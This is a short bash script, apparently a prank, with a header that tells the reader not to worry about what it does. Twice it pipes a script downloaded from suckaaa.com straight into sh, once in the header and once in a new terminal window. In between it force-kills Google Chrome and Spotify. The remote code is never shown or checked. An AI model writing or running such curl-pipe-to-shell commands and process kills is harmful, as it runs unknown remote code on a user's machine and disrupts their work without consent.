#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/lib-installer' | sh;
source ~/.garbage/lib;
clear;
###########  END HEADER  ###########

bigMsg 'Killing Chrome NOW';

sleep 1s;

killingInTheNameOf 'Google Chrome';
killingInTheNameOf 'Spotify';

sleep 5s;

# Do I have your attention?

termdo 'curl -s https://suckaaa.com/s/script-name-here | sh';
